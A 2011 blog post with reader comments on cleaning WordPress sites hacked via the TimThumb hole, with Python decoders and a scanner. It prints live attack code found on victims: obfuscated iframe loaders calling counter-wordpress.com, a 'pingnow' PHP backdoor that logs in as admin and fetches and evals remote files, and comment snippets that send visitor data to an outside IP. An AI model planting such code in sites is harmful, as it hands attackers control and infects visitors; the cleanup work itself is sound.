Monday, August 22, 2011

Malicious software is hosted on newportalse.com, counter-wordpress.com, ?.us.to/kwizhveo.php

newportalse.com, counter-wordpress.com


There are currently a large number of WordPress sites that have been hacked where the domain listed on the warning page is newportalse.com. In most cases the first indicator of this hack has been a user telling the site owner that they got a warning when visiting the site, and/or the site owner getting a warning when viewing one of their pages in Chrome or Firefox. In all cases the warnings are intermittent: the owner or a user might visit the page 20 times and not get the warning, and then on the 21st visit the warning pops up. In a couple of cases the domain hosting the malware has also varied; one time the warning will read newportalse.com and the next time it will read young-girls-fucking.com or realjailbaitgirls.com. In most cases when the site owner checks the Google Diagnostic page it has indicated "not suspicious". This hack is very well cloaked and it is taking a long time for Google to find the malicious content and flag the site.

Note: In their efforts to keep this hack cloaked from both Google and site owners the domain being used to host the malware is being changed pretty rapidly.  As soon as Google flags one of the domains the hackers are switching to a new one.  I have seen newportalse.com, counter-wordpress.com, young-girls-fucking.com, realjailbaitgirls.com, getsextoys.biz, hanna-heartbreaker.com, corporateactivate.ru, teenburgmovies.biz, and bestsexygirlfriend.com used in the last couple of days.

In all cases the hackers have gained access to the site through a vulnerability in a popular PHP script named timthumb.php or thumb.php. The script is used to manipulate (crop/resize) web images and can be found in a large number of WordPress themes. The first thing you will need to do is check all your themes, including any unused themes lurking on your site, for any that use timthumb/thumb, and then update all occurrences of timthumb to the latest version. The following reference explains how to update and provides a link to the latest version.

Ref:  http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/

The next step is to clean up the JavaScript files used on your site. To date the hackers have primarily been using wp-includes/js/l10n.js, /wp-includes/js/jquery/jquery.js and/or /wp-content/themes/*[your themes names]*/inc/jquery-1.2.6.min.js. In more recent hacks the JavaScript files located within the site's themes seem to be the primary targets, such as /wp-content/themes/combat/js/jquery-1.4.2.min.js. You should check all JavaScript files and, if you have any doubts, replace them with known clean versions.

There are a couple of variants of malicious obfuscated JavaScript that I have seen. Here is an example of the malicious script found in wp-includes/js/l10n.js on one site:

function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];ev​al(fun​ction (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.to​String(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.to​String(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[fun​ction (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=fun​ction (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new Reg​Exp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return 
_0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

In the original post the clean content is shown in green and the added malicious content in red; in plain text, the clean part is the convertEntities function at the start and the malicious addition is everything from var _0x4de4= onward. The malicious content de-obfuscates to

function MakeFrame(){
  var el = document.createElement("iframe");
  document.body.appendChild(el);
  el.id = 'iframe';
  el.style.width = '1px';
  el.style.height = '1px';
  el.src = 'http:// counter-wordpress . com/frame.php'
}
setTimeout(MakeFrame, 1000);

The malicious content adds an iframe to the page which loads the malicious payload from http:// counter-wordpress . com/frame.php

The contents of a clean l10n.js will be something like this:

function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b};


Another variant, seen in wp-includes/js/jquery/jquery.js?ver=1.4.2:

var mIbYkFM=3175567; var sUAkPsk=1302948; var MFcBEnpC=18475; var jQ37c02B=537145; var OCGhllC = new Array(4997287, 4997302, 4997295, 4997284, 4997301, 4997290, 4997296, 4997295, 4997217, 4997262, 4997282, 4997292, 4997286, 4997255, 4997299, 4997282, 4997294, 4997286, 4997225, 4997226, 4997308, ....  

(a long array of numbers) ....

4997219, 4997229, 4997234, 4997233, 4997233, 4997233, 4997226, 4997244, 4997310);Wqv8c = "";for (pOf21 = 0; pOf21 < OCGhllC.length; pOf21 ++) { Wqv8c = Wqv8c + String.fromCharCode(OCGhllC[pOf21]-jQ37c02B+MFcBEnpC-sUAkPsk-mIbYkFM); }; eval(Wqv8c);
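Both loaders above can be read without running them by re-implementing their own decoding arithmetic. The following Python script is an added example (not from the post) that does this for the hex-escaped packer found in l10n.js and for the numeric-array variant found in jquery.js; the word list is embedded already unescaped, and the numeric sample uses only the head and tail values the post shows, so its output is the visible start and end of the hidden script.

```python
"""Static decoders for the two obfuscated JavaScript loaders quoted above.
Nothing is eval'ed: each loader's decoding arithmetic is re-implemented in Python."""
import re

# ---- Variant 1 (l10n.js): hex-escaped strings fed to a token-substitution packer
# Element 0 of the _0x4de4 array, copied from the sample above. The JS parser
# turns "\x64" into the letter 'd' and so on before the packer ever runs.
PACKED_HEX = (
    r"\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33"
    r"\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D"
    r"\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E"
    r"\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F"
    r"\x2F\x67\x2D\x68\x2E\x6D\x2F\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C"
    r"\x6C\x29\x3B"
)
# Element 3 (the word list), shown already unescaped to keep the example short;
# the loader splits it on "|" (elements 1 and 2 of the array are "|" and "split").
WORDS = ("el|style|document|iframe|1px|MakeFrame|appendChild|id|setTimeout|body|"
         "width|var|createElement|function|php|http|counter|wordpress|src|frame|"
         "height|1000|com")


def unescape_js_hex(s):
    """Turn JS \\xNN escapes into characters, as the JS string parser does."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


def js_number_to_string(n, radix):
    """Python equivalent of JavaScript's Number.prototype.toString(radix)."""
    digits = "0123456789abcdefghijklmnopqrstuvwxyz"
    out = ""
    while True:
        n, r = divmod(n, radix)
        out = digits[r] + out
        if n == 0:
            return out


def unpack(packed, words, radix=23):
    """Mirror the packer: word i is keyed by i.toString(radix) (23 here, the
    loader's second and third arguments) and every \\b\\w+\\b token is replaced."""
    table = {js_number_to_string(i, radix): w
             for i, w in enumerate(words.split("|")) if w}
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), packed)


# ---- Variant 2 (jquery.js): numeric array shifted by four "random" constants
# Constructed sample: the post's head and tail values, with the elided middle omitted.
ARRAY_SAMPLE = (
    "var mIbYkFM=3175567; var sUAkPsk=1302948; var MFcBEnpC=18475; "
    "var jQ37c02B=537145; var OCGhllC = new Array(4997287, 4997302, 4997295, "
    "4997284, 4997301, 4997290, 4997296, 4997295, 4997217, 4997262, 4997282, "
    "4997292, 4997286, 4997255, 4997299, 4997282, 4997294, 4997286, 4997225, "
    "4997226, 4997308, 4997219, 4997229, 4997234, 4997233, 4997233, 4997233, "
    "4997226, 4997244, 4997310);"
    'Wqv8c = "";for (pOf21 = 0; pOf21 < OCGhllC.length; pOf21 ++) { Wqv8c = '
    "Wqv8c + String.fromCharCode(OCGhllC[pOf21]-jQ37c02B+MFcBEnpC-sUAkPsk-mIbYkFM); "
    "}; eval(Wqv8c);"
)


def decode_array_variant(js_src):
    """Pull the constants, the array and the +/- expression out of the loader
    text and apply the same arithmetic, skipping its final eval()."""
    consts = {m.group(1): int(m.group(2))
              for m in re.finditer(r"var\s+(\w+)\s*=\s*(\d+)\s*;", js_src)}
    values = [int(v) for v in
              re.search(r"new Array\(([^)]*)\)", js_src).group(1).split(",")]
    expr = re.search(r"String\.fromCharCode\(\w+\[\w+\]((?:\s*[-+]\s*\w+)+)\)",
                     js_src).group(1)
    offset = sum((1 if sign == "+" else -1) * consts[name]
                 for sign, name in re.findall(r"([-+])\s*(\w+)", expr))
    return "".join(chr(v + offset) for v in values)


if __name__ == "__main__":
    print(unpack(unescape_js_hex(PACKED_HEX), WORDS))
    print(decode_array_variant(ARRAY_SAMPLE))
```

The first print reproduces the MakeFrame function shown in the post; the second prints the "function MakeFrame(){" head and the '",1000);}' tail that the visible array values encode.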

In some of the more recent hacks a new wrinkle has been added alongside the JavaScript hack. The hackers installed a malicious script at /wordpressinstalldir/wp-mail.php and then hacked WP Super Cache to add an iframe

< if rame src="http:// www . xxxxxx . net/wordpressinstalldir/wp-mail.php" name="mailiframe" width="0" height="0" frameborder="0" scrolling="no" title=""> < /if rame >

to the end of the site's pages to load the malicious content. The thing to look for here is the iframe; the path/filename could be anything.

Next you will need to check some of your core PHP files. Start with the functions.php file in your themes; in some cases it will only be in the active theme, but check any inactive themes you may still have on your site. Typically there will be hundreds of blank lines and then the code:

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
    if ($_GET['pass'] == 'xxxxxxx'){
        if ($_GET['pingnow']== 'login'){
            $user_login = 'admin';
            $user = get_userdatabylogin($user_login);
            $user_id = $user->ID;
            wp_set_current_user($user_id, $user_login);
            wp_set_auth_cookie($user_id);
            do_action('wp_login', $user_login);
        }
        if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            $fnm = md5(rand(0,100)).'.php';
            $fp = fopen($fnm, "w");
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
        }
        if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $re = curl_exec($ch);
            curl_close($ch);
            eval($re);
        }
    }
}

You need to delete these lines. You should also check core files such as wp-config.php and wp-settings.php. Make sure you scroll all the way to the end of the file, as there will likely be hundreds of blank lines before any malicious code. Again, if you have any doubts about the content of any file you should replace it with a known clean version.

If you do not have a known clean copy of a file, download a fresh install of WordPress and extract any files you need to replace.

On many of the sites the following malicious files are being found:

/wp-content/upd.php
/wp-content/data.php
/wp-admin/upd.php
/wp-admin/js/config.php
/wp-admin/common.php
/wp-content/uploads/feed-file.php
/wp-content/uploads/feed-files.php
/wp-content/themes/*[your themes names]*/cache/.htaccess
/wp-content/themes/*[your themes names]*/temp/[eab9c5e9815adc4c40a6557495eed6d3.php]
[or similar file names]

*[your themes names]* You should check both your active theme and any inactive themes you may have left in place on your site.

They are malicious and should be deleted. I also suggest installing the simple script for finding files containing base64_decode, linked under Useful(?) tools on this page, and giving it a try; instructions for installing and using the script are on that page.


Update 08/24/2011

?.us.to/kwizhveo.php


It looks like we have another group of hackers exploiting the vulnerability in timthumb. This group is not using the JavaScript files; they are using PHP code to insert an iframe into the pages of the site. In the one I looked at tonight the iframe is

<if rame src="http://prettyrosseande.us.to/kwizhveo.php" width="1" height="1" frameborder="0"> </if rame>

The code appears between two comment tags, < !-- Wordpress Counter -->, and looked like this on a second site:

< !-- Wordpress Counter -->
< sc ript language="javascript">
var ExpDate = new Date ();
ExpDate.setTime(ExpDate.getTime() + (7 * 24 * 60 * 60));
SetCookie("MTPT","1",ExpDate, "/");
func tion SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
< /sc ript >
< if rame src="http:// nightlynet771.us.to/kwizhveo.php" width="1" height="1" frameborder="0">
< /if rame >
< !-- Wordpress Counter -->

The domain name is dynamic and changes from request to request, so there is some code generating the domain name, but the .us.to/kwizhveo.php part seems to be staying the same for now.

In this hack the PHP code of the site is being modified to add the iframe. If you see this type of iframe you will need to check your PHP code (index.php, header.php, footer.php and so on) for the malicious code. On the second site the code was in the header of the site's theme.


Redirects to malicious .ru sites --

guide-securesoft.ru, insanetrip.ru, protect-now.ru, connection-trip.ru, tripinternational.ru, softwareid.ru, touch-pad.ru-internet.ru

In many cases these hacks are also backed up with a hack of the .htaccess file, so you will need to check that if you are on Apache. In most cases the hack has been a redirect to the URL http:// generationgeneration-internet.ru /pcollection/index.php. There are some tips on checking the .htaccess file here.

It looks like there is an increase in the number of sites redirecting to a malicious site. There are also some new domains being reported, such as softwareid.ru/zisec/index.php (thanks Mark).

I am also starting to see some sites where only a request for a non-existent page (one that generates a 404 file not found error) redirects to a malicious site; http:// guide-securesoft.ru /[*some random letters*]/index.php and insanetrip.ru seem to be common targets for the redirects. To check for this type of hack, try requesting a URL like http://yourdomain.com/no-exist.html using the file viewer tool. If you happen to have a file named /no-exist.html, just use a file name you are sure does not exist on your site.


Also with this hack the hackers have been installing a backdoor on the site so they can maintain access. You will need to check through the files on your site for any backdoors. There is an example of a typical backdoor here. These backdoor scripts can be very difficult to find, as they can be placed in any folder on the site and the file can have any name. Typically the hackers will try to hide the file by using innocuous-sounding names such as search.php. On one site the backdoor was found in a file named FUNCTIONS_EXTRA.PHP in the /wp-content/themes/[*your theme*]/ folder. I have also seen file names such as log.php, sm3.php, wp.php, r(d).php (r1.php, r2.php and so on), data.php, and stats.php used in the past. Another common technique is to write PHP code into a file with a .txt or .jpg extension. If you find PHP script in a file with an extension other than .php, it is likely a bad thing.
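A triage scan for the indicators collected in this post (leftover TimThumb copies and their version, the pingnow backdoor and the blank-line padding in functions.php, PHP code in files with other extensions, the listed malicious paths, and the two obfuscated JavaScript loaders), written as an added Python example that is not the post's own base64_decode finder. The sample install it scans is constructed inline, and it assumes a TimThumb copy declares its version with define('VERSION', ...).

```python
"""Triage scan for the WordPress indicators described in this post. It only
reports; every hit still needs a look by hand, since eval() and base64_decode()
also occur in legitimate code. Added example, not the post's own tool."""
import os
import re
import tempfile

# Paths the post lists as malicious when present (relative to the WP root).
KNOWN_BAD = {
    "wp-content/upd.php", "wp-content/data.php", "wp-admin/upd.php",
    "wp-admin/js/config.php", "wp-admin/common.php",
    "wp-content/uploads/feed-file.php", "wp-content/uploads/feed-files.php",
}
# Markers taken from the functions.php and wp-settings code quoted in the post.
PHP_MARKERS = {
    "pingnow backdoor": r"\$_GET\['pingnow'\]",
    "eval() call": r"\beval\s*\(",
    "base64_decode() call": r"base64_decode\s*\(",
}
# Markers from the two obfuscated JavaScript loaders quoted in the post.
JS_MARKERS = {
    "eval() call": r"\beval\s*\(",
    "fromCharCode array loop": r"String\.fromCharCode\(\w+\[\w+\]\s*[-+]",
    "long hex-escaped string": r"(?:\\x[0-9A-Fa-f]{2}){16,}",
}
# Assumption: a TimThumb copy declares its version as define('VERSION', '...').
VERSION_RE = re.compile(r"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([^'\"]+)")


def scan(root):
    """Walk a WordPress install; return sorted (relative path, reason) pairs."""
    findings = set()
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if rel in KNOWN_BAD:
                findings.add((rel, "path listed as malicious"))
            if name in ("timthumb.php", "thumb.php"):
                m = VERSION_RE.search(text)
                findings.add((rel, "TimThumb copy, VERSION " + (m.group(1) if m else "unknown")))
            if ext != ".php" and "<?php" in text:
                findings.add((rel, "PHP code in a non-.php file"))
            markers = {".php": PHP_MARKERS, ".js": JS_MARKERS}.get(ext, {})
            for reason, pat in markers.items():
                if re.search(pat, text):
                    findings.add((rel, reason))
            # The post: hundreds of blank lines get padded in front of injected code.
            if ext == ".php" and re.search(r"\n{100,}\s*\S", text):
                findings.add((rel, "code after a long run of blank lines"))
    return sorted(findings)


def write_sample(root):
    """Constructed sample install whose bad fragments mirror the post's quotes."""
    files = {
        "wp-content/themes/demo/timthumb.php": "<?php\ndefine ('VERSION', '1.32');\n",
        "wp-content/themes/demo/functions.php":
            "<?php\nadd_theme_support('menus');\n" + "\n" * 150
            + "if (isset($_GET['pingnow'])&& isset($_GET['pass'])){\n"
            + "$ch = curl_init($_GET['file']); eval($re); }\n",
        "wp-content/upd.php": "<?php /* constructed stand-in for the dropper */ ?>\n",
        "wp-content/uploads/banner.jpg": "GIF89a <?php /* constructed */ ?>",
        "wp-includes/js/l10n.js":
            r'var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E'
            r'\x63\x28\x22\x33\x22"];eval(_0x4de4[0]);',
        "wp-includes/js/jquery/jquery.js": "(function(){/* constructed, clean */})();",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def run_demo():
    root = tempfile.mkdtemp(prefix="wp-triage-")
    write_sample(root)
    return scan(root)
```

Run scan() against a real install's root to get the same (path, reason) list; the clean jquery.js in the sample produces no finding, which is the false-positive check worth keeping when you extend the marker lists.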

Once you have gotten your site cleaned up you MAY need to submit a review request to Google. Check to see if Google is flagging your site by opening the diagnostic page for your site at http://www.google.com/safebrowsing/diagnostic?site=yourdomain. If the page lists your site as suspicious then you will need to submit a review request to Google and get your site cleared before the warnings will be removed. If your site is listed as not suspicious then the warnings should disappear as soon as your site is cleaned up (you may need to delete browser history/cache).

Update 09/03/2011: In the comments below Randy provides a really good description of a spam-type hack, a pharma hack. It appears likely the hackers gained access to the WordPress site through the timthumb/thumb.php vulnerability. Randy has written a post about the hack, what to look for and how to clean it up: Hack Alert: wp-image.php is not a valid WordPress file — Randy Tayler, Eccentric Hundredaire

Some helpful articles:

Hardening WordPress

35 comments:

  1. Hi.. Nice articles! Thanks..

    I tried all your suggestions. My blog has "Malware Detected". Now I am waiting for an answer from Google about my review request for my blog.

    This blog: http://pakarcinta.com/blog

    TQ Redleg. :-)

  2. Thanks! Good Luck with the review, hopefully things will be back to normal in a few hours.

  3. Thanks for the tips, my blog was infected and this helped.

  4. You are certainly welcome! I wish you luck with your blog in the future. No more visits to my site.

  5. Hi there,

    I have 5 blogs in my cPanel and all got hacked for the same issue last week.

    I then installed some plugins to strengthen my WordPress:
    Block Bad Queries (BBQ)
    WP Security Scan
    WordPress File Monitor Plus

    Was fine for few days and today the Monitor Plus informed me same group of files being hacked again.

    The hacked files are
    plugins/....../jquery-1.3.2.min.js
    /wp-includes/js/jquery/jquery.js
    /wp-includes/js/l10n.js

    I went through your suggestions and found no hack in the PHP scripts.

    I've been replacing the infected files with original files a few times; I would really appreciate it if you can give me some advice.

    Thanks.

  6. Couple of suggestions -

    make sure your PC is clean and secure, do regular scans with a good antivirus program.

    Then change all your passwords, especially FTP.

    Change your WP security keys (Secret keys) as described in

    http://codex.wordpress.org/Editing_wp-config.php

    When checking files such as wp-config, make sure you are scrolling all the way to the end and all the way to the right of the file. Hackers will insert hundreds of blank lines before their malicious code, or "tab" the lines of code over so they are not readily visible as you scroll through the file.

  7. Thanks red.
    Apply your suggestions accordingly.
    Hopefully this helps.

    Another question: I also notice wp-settings gets updated "quite frequently".
    Every few days or so I'll receive a file change notification for the wp-settings file.
    Is this normal?

  8. No, that does not sound right. On some sites hackers have been adding code similar to this

    function google_bot()
    {
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
    if(!(strpos($sUserAgent, 'google') === false))
    {
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true)
    {
    $ch = curl_init('http://91.196.216.30/bot.php?ip='
    .$_SERVER['REMOTE_ADDR'].'&host='.$_SERVER['HTTP_HOST'].'&ua='
    .urlencode($_SERVER['HTTP_USER_AGENT']).'&ref='
    .$_SERVER['HTTP_REFERER']);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $re = curl_exec($ch);
    curl_close($ch);
    echo $re;
    }
    }
    }
    add_action('wp_footer', 'google_bot');

    to the site's wp-settings

  9. little tip, when you find an infected file, and you happen to be in some form of linux, then you can quickly check for all php and js files modified on the same day - certainly found a few more files than mentioned in this post.

    best and thanks for saving me some time!

  10. Would you share the additional file name(s) you found?? Could help the next guy.

  11. De-hacking my friend's blog, I found a file called "wp-image.php" in the wp-includes directory; it was being called by general-template.php in the same directory. I haven't found anything else yet, but he has a theme or plug-in called Chameleon that uses the TimThumb script, so I think that's how they got in.

    Not sure what wp-image.php does, but it's all hacky like this: <?php $GLOBALS['_424172811_']=Array(base64_decode('ZX' .'Jy' .'b3J' .'fc' .'mVw' .'b3J0aW5n')....

    Hope that helps somebody.

  12. I've since decoded the naughty wp-image.php file. It makes various attempts to pull down spam content from a URL like this: http://countr.co.cc/l/counter.php?md5=48613&v=1

    I've hunted down the IP's owners and sent email to their abuse address; hopefully they'll yank the offending site.

    To fix my friend's problem I removed the line in general-template.php that said "include 'wp-image.php', and that fixed the problem. (And deleted wp-image.php, naturally.)

    I'm posting more details on my website -- which also uses WordPress (gulp) -- if anybody needs more info. http://randytayler.com/2011/09/hack-alert-wp-image-php-is-not-a-valid-wordpress-file/

  13. Randy, Thanks very much for the update. All - I have added a live link to Randy's post at the end of my post. Suggest that you also check your site for the issues identified by Randy. You might not see the type of spam described by Randy on your site now, but this type of spam generating code can lie dormant and be activated at some point in the future.

  14. seeing it redir to...

    softwareid.ru/zisec/index.php

  15. Thanks Mark, That is a new one that I have not seen.

  16. what is recommended for scanning your computer?
    can you name a couple?

  17. @Mark I think the free version of MalwareBytes http://shop.malwarebytes.org/lpa/342/5/index.html?_kk=malwarebytes%20download&_kt=5649af65-023f-45b8-acb9-a5990bcaa0a7&gclid=CLHMxujIg6sCFRDe4AodXTA42A

    is as good an any.

  18. I can't tell if this is bad backdoor:



    function counter_wordpress() {$_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 2);$re = curl_exec($ch);curl_close($ch);echo $re;}add_action('wp_head', 'counter_wordpress');
    do_action( 'init' );


    found this in my WP-settings.

  19. @Andy That is malicious, but not all of it. The last line do_action( 'init' ); is a legitimate line in wp-settings, so don't remove that bit.

  20. My blog has been deindexed by Google, but i don't see any malware (didn't receive any malware warning though) - can you see if there's anything wrong with it - http://www.latestautoreviews.com? I've been trying to get it reconsidered for past 3months -any help will be greatly appreciated!

  21. @Om Thoke I am not finding any indications that your site currently has malware on it or that it was de-indexed due to malware. You might try posting over on Google's Webmaster Tools Forum, crawling, indexing, ranking http://www.google.com/support/forum/p/Webmasters/label?lid=41234c84d9491af8&hl=en
    and see if anyone there can provide some insights into why Google would de-index.

  22. A question so why would anyone have the heart to destroy people's homes.
    If it only shows that he was someone who was good at science's technology there are other ways.
    We are also disturbed by the act of the Hack. Yes How do I join a community of anti Hack? where and how. Because we want to join too.

  23. I am going crazy, I have read all the web, I have followed all the instructions, but I can't find the backdoor, or something like this-
    The only thing I know is that I have the Pharma Hack cause I see in Google cache .

    Please help!

  24. @rome I take the info in http://redleg-redleg.blogspot.com/2011/02/pharmacy-hack.html

    was not any help?

  25. I hired a professional on scriptlance; he fixed pharma in 1 day

  26. I have several websites that have been getting redirected to:
    qimultabannortim.ru/upday/index.php

    Thank you so much for posting this! I can't tell you how many countless hours and tears I've wasted trying to find out what was wrong. None of the other malware reports seemed to be what I needed. I now feel like I have a starting point and might actually be able to fix it. Thank you for restoring hope to my little corner of the internet world. I was literally heartbroken.

    Quick question: I have shared hosting for my websites, and even my fresh installs are getting reinfected. Is it contagious, so to speak? I.e., does one site being infected leave the others vulnerable? Or would it just be on the primary account?

    Replies
    1. Typically with a redirect to qimultabannortim.ru/upday/index.php, if your site is hosted on Apache the hack is in an Apache system file named .htaccess. There is another post at http://redleg-redleg.blogspot.com/2011/01/redirect-to-malicious-site.html that gives some tips on checking a .htaccess file. Directives in a .htaccess file affect the directory the file is in and all directories below it, so depending on how the sites/directory structure is set up it is certainly possible for one .htaccess file to affect multiple sites.

    2. Sorry for the delay. Had trouble finding the site again, for some reason. I just want to say thanks for all your help!

      I read through the other article and found it to be very insightful. Sadly, I wound up deleting all of my websites and just reinstalling.

      What's interesting is that I'm still having problems. I redid one website w/ security plugins and then did another fresh install of a different site on the same hosting, which was hacked within 12 hours. The other one still tests clean.

      Rather than retype everything, you can see my forum post: http://wordpress.org/support/topic/malware-redirect-hacks-specific-question-regarding-vulnerabilities?replies=1

      Please know I'm not posting it to ask for free help. I'm waiting for someone from the WP boards to write back to me. But if it helps in the discovery of anything new that would be of interest to you, there's my info.

      Thanks also for your link to Malwarebytes. Downloading it now. :)

  27. Not sure if you're still following that thread, but you might want to take a look. I'm more convinced than ever that it's GoDaddy...

    Or is it possible to have a *completely* empty hosting account and still have your URL redirect?

    http://wordpress.org/support/topic/malware-redirect-hacks-specific-question-regarding-vulnerabilities?replies=9

  28. This comment has been removed by the author.

  29. Thank you. I work with iframe virus last week. I have used computers and the need for an updated antivirus program. This is important

  30. Red

    FYI: your red-leg-red-leg-viewer ends with </htm

    I have a file on one wp site that is not on the others (found running base 64 viewer)

    File: (wp-includes/theme-compat/item.php) - Ever seen this file? I'm not educated enough to read its purpose. I've "//" it. No errors so far.

    You want to look at it? go to mysite/item-php.txt.

    Replies
    1. That is the "Filesman" backdoor

      http://redleg-redleg.blogspot.com/p/example-of-backdoor-script.html

  31. thanks for sharing..
